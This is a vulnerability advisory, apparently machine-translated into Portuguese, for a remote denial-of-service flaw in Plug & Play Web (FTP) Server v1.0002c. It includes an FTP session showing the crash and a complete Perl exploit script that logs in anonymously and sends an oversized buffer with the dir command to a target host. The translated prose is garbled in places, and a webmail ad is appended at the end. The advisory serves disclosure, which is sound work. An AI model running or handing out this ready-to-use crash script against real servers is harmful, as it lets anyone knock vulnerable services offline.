Recusa De Serviço
em Tomada & Joga Web (FTP) ServerIntroduction:
========
"A Tomada e Joga Servidor De Web fornece não menos do que
as ferramentas você necessita hospedar
seu
próprio website. As ferramentas são empacotadas juntamente
em um software compreensivo
empacote que isto está incrivelmente fácil para usar e
mantem."
- Descrição Dos Vendedores
[ http://www.pandpsoftware.com ]Detalhes:
=====
Sistemas Vulneráveis: Tomada & Joga versão de Servidor
De Web 1.0002c
Uma vulnerabilidade tem sido identificada em Tomada & Joga Web (FTP)
servidor
V1.0002c,
que permite usuários do malicious para remotamente colidem o
servidor. Por conectar para
o servidor e emitindo um comando (dir, ls, apaga, mkdir, DELE, RMD,
MKD)
seguido por quantias grandes de dados, as colisões de servidor.
dir [Ax509]
ls [Ax509]
delete [Ax509]
mkdir [Ax509]
DELE [Ax509]
RMD [Ax509]
MKD [Ax509]
Example:
--------------------
ftp> o 127.0.0.1
Connected to 127.0.0.1.
220 Plug and Play Web Server V1.0
User (127.0.0.1:(none)): anonymous
331 Password required for anonymous
Password:
230 User anonymous logged in
ftp> dir
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
200 PORT command successful
Connection closed by remote host.
ftp> o 127.0.0.1
>ftp: connect :Unknown error number
ftp>
--------------------Vendor status:
=========
O vendedor tem sido informado, e eles estão fixando este bug.
A versão atualizada, quando liberada, pode ser descarregada de:
http://www.pandpsoftware.com/download.htmExploit:
=====
#!/usr/bin/perl
#
# ppftpdos.pl - recusa Remota de serviço contra Tomada &
Joga servidor de Web
V1.0002c
#
# Uma vulnerabilidade tem sido identificada em Tomada & Joga servidor
de FTP V1.0002c,
que
# permite usuários do malicious para remotamente colidem o servidor.
Por conectar ao
# servidor e emitindo um comando (dir, ls, apaga, mkdir, DELE, RMD,
MKD)
# seguido por quantias grandes de dados, as colisões de servidor.
Para mais informação, vai
para:
# http://bsecurity.4t.com/advisories/pandpdos.txt
#
# Usage : ./ppftpdos.pl <host/ip>
#
# Vulnerability & code by Bahaa Naamneh
# Contact : [email protected] - www.bsecurity.tk
use Net::FTP;
$host = $ARGV[0];
$buffer =
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
if("$ARGV[0]" eq "") {
print("DOS against Plug & Play FTP Server by Bahaa Naamneh\n");
print("[email protected] - http://www.bsecurity.tk\n");
print("====================================================\n");
die("Usage : ./PPftpdos <host\/ip>\n");
} else {
print("Connecting to $host...\n");
my $ftp = Net::FTP->new($host) or die "Couldn't connect to $host\n";
print("Connected!\n");
$username = "anonymous";
$password = "anonymous";
$ftp->login($username, $password)
or die "Could not log in.\n";
$ftp->dir($buffer);
$ftp->quit();
print("Server crashed!\n");
}Discovered by/Credit:
==============
Bahaa Naamneh
[email protected]
http://www.bsecurity.tk
_________________________________________________________________
The new MSN 8: advanced junk mail protection and 2 months FREE*
http://join.msn.com/?page=features/junkmail